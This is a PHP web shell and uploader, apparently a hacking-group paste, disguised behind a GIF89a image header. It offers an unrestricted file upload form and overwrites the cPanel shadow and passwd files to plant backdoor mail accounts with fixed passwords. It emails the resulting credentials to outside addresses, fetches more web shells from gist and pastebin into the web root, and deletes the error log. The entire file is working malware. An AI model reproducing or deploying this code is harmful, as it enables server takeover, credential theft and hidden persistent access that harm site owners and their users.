uploadbykenzuna

1. GIF89a1
2. GIF89a1
3.  
4. <center>
5.  
6. <style>
7.  
8. body {
9. background: url(https://media2.giphy.com/media/AWvasQ7DgzLXO/giphy.gif) no-repeat center center fixed;
10. -webkit-background-size: cover;
11. -moz-background-size: cover;
12. -o-background-size: cover;
13. background-size: cover;
14. color: rgba(255, 255, 255, 0.25);
15. text-align: center;
16. margin: 0;
17.  
18. }
19. </style>
20.  
21. <?php
22. echo '<center><h1>UPLOADER BY Kenzuna & Madara</h1>'.'<br>'.'Uname : '.php_uname().'<br> Posisi : '.$cwd = getcwd(); Echo '<br><br><center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> </form> </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']); Echo "<script>alert('upload Done'); </script><b>DR SH3LL A FAIT SON BOULOT ;)</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; }
23. @ini_set('output_buffering', 0);
24. set_time_limit(0);
25. ini_set('memory_limit', '64M');
26. ini_set('max_execution_time',0);
27.  
28. $ips = getenv('REMOTE_ADDR');
29.  
30. $wr = 'infos:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
31. hussam:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
32. abi_layla:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
33. accountmu:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
34. adminustratro:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
35. salesman:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
36. ';
37. $hm = 'infos:x:534:532::/home/$user/mail/$t/info:/home/$user
38. hussam:x:534:532::/home/$user/mail/$t/hussam:/home/$user
39. abi_layla:x:534:532::/home/$user/mail/$t/jancok:/home/$user
40. accountmu:x:534:532::/home/$user/mail/$t/account:/home/$user
41. adminustratro:x:534:532::/home/$user/mail/$t/t:/home/$user
42. salesman:x:534:532::/home/$user/mail/$t/salesman:/home/$user
43. ';
44. $ports=array(25, 587, 465, 110, 995, 143 , 993);
45. $primary_port='25';
46. $user=get_current_user();
47. $password='kontol87';
48. $pwd = crypt($password,'$6$kontol87$');
49. $t = $_SERVER['SERVER_NAME'];
50. $t = @str_replace("www.","",$t);
51. @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow');
52. $ex=explode("\r\n",$passwd);
53. @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.kontol87.bak');
54. @unlink('/home/'.$user.'/etc/'.$t.'/shadow');
55. foreach($ex as $ex){
56. $ex=explode(':',$ex);
57. $e= $ex[0];
58. if ($e){
59. $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b);
60. echo '<center><span style=\'color:#00ff00;\'>'.$t.'|25|'.$e.'@'.$t.'|'.$password.'<br>';
61. }}
62. $c = fopen('/home/'.$user.'/etc/'.$t.'/passwd', 'a+');
63. fwrite($c, $hm);
64. fclose($c);
65. $f = fopen('/home/'.$user.'/etc/'.$t.'/shadow', 'a+');
66. fwrite($f, $wr);
67. fclose($f);
68. $parm = 'https://'.$t.':2096';
69. $peli = 'D-nCtnVO%JNl';
70. $kirim = '
71.  
72. SMTP AUTO CREATE
73.  
74. '.$t.'|25|'.$e.'@'.$t.'|'.$password.'
75. --------------------------------------------
76. '.$parm.' | infos@'.$t.' | ' .$peli.'
77. '.$parm.' | hussam@'.$t.' | ' .$peli.'
78. '.$parm.' | abi_layla@'.$t.' | ' .$peli.'
79. '.$parm.' | accountmu@'.$t.' | ' .$peli.'
80. '.$parm.' | adminustratro@'.$t.' | ' .$peli.'
81. '.$parm.' | salesman@'.$t.' | ' .$peli.'
82.  
83.  
84. ';
85. header('Content-Type: text/html; charset=UTF-8');
86. $tujuanmail = 'tampungan.bakdur@gmail.com,kefiex@hotmail.com';
87. $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
88. $pesan_alert = "Wso - /wp-includes/js/include.php \n idbv2 - /wp-content/themes/anu.php \n uploader - /wp-admin/user/.wsa.php \r\n [ " . $_SERVER['SERVER_NAME'] . " ]";
89. mail($tujuanmail, "Plugin Auto Wget", $pesan_alert, $kirim);
90. function http_get($url){
91. $im = curl_init($url);
92. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
93. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
94. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
95. curl_setopt($im, CURLOPT_HEADER, 0);
96. return curl_exec($im);
97. curl_close($im);
98. }
99. $check1 = $_SERVER['DOCUMENT_ROOT'] . "/cache/include.php" ;
100. $text1 = http_get('https://gist.githubusercontent.com/obik87/fdaecaeda894cc9853ea53da1d1940fc/raw/92f687949dbf8a1ef37ef5e592fb8bfdde1a7ab3/waa');
101. $open1 = fopen($check1, 'w');
102. fwrite($open1, $text1);
103. fclose($open1);
104. if(file_exists($check1)){
105. }
106. $check2 = $_SERVER['DOCUMENT_ROOT'] . "/admin/anu.php" ;
107. $text2 = http_get('https://gist.githubusercontent.com/obik87/fdaecaeda894cc9853ea53da1d1940fc/raw/92f687949dbf8a1ef37ef5e592fb8bfdde1a7ab3/waa');
108. $open2 = fopen($check2, 'w');
109. fwrite($open2, $text2);
110. fclose($open2);
111. if(file_exists($check2)){
112. }
113. $check3 = $_SERVER['DOCUMENT_ROOT'] . "/upload/.wsa.php" ;
114. $text3 = http_get('https://pastebin.com/raw/BbcCvJ9S');
115. $open3 = fopen($check3, 'w');
116. fwrite($open3, $text3);
117. fclose($open3);
118. if(file_exists($check3)){
119. }
120. $check21 = $_SERVER['DOCUMENT_ROOT'] . "/+.php" ;
121. $text21 = http_get('https://pastebin.com/raw/XewAB4M0');
122. $open21 = fopen($check21, 'w');
123. fwrite($open21, $text21);
124. fclose($open21);
125. if(file_exists($check21)){
126. }
127. unlink("error_log");
128. ?>